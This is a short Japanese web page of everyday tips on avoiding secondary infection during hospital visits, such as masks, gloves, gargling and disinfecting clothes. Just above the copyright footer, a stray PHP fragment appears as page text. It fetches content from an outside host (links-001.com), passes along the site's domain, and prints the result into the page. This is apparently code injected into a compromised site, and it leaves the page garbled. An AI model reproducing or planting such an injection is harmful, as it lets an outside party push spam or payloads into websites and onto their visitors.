最新のお知らせ一覧

医療機関を利用した際の二次感染を防ぐための工夫

医療機関は怪我や病気を治療するための施設ですが、様々な疾患を抱えている人が出入りする場でもあるので、他の人の病気が感染してしまうリスクも存在します。
特に季節の変わり目では風邪の症状が罹患するケースが多いので、病気を治しに行った病院で病気を貰ってしまう結果になりかねません。
二次感染を防ぐためには事前の準備が重要になります。
病院での二次感染は疾患を抱えている人との不用意な接触が原因の多数を占めます。
せきやくしゃみを頻繁に行う人には近づかない他、自身もマスクや手袋などを使用して吸引や接触を避けるように工夫することが大切です。
また、帰宅時にはうがいや洗顔を行って体に付着した細菌を洗い流すのも病気の感染を防ぐ効果的な対処法になります。
衣類には医療用のアルコール液など殺菌作用を持つ薬剤を散布するのも病源菌を持ち込まない工夫の一つです。
病気の予防は日頃からの適切な対処が大切なので、正しい知識を持って臨む姿勢が必要になります。

".file_get_contents('http://links-001.com/123set4.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>


Copyright© 医療 All Rights Reserved.